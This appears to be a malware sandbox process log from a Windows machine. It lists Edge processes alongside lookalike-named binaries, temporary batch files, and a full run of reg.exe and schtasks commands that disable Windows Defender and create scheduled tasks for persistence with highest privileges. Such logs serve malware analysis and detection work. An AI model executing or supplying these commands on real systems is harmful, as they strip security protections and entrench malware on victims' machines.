w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc54b846f8,0x7ffc54b84708,0x7ffc54b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\45aGjaybPu.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\msedge.exe'" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\it-IT\msedge.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6GXVlfePFq.bat"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\ja-JP\msedge.exe
"C:\Windows\ja-JP\msedge.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4148 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
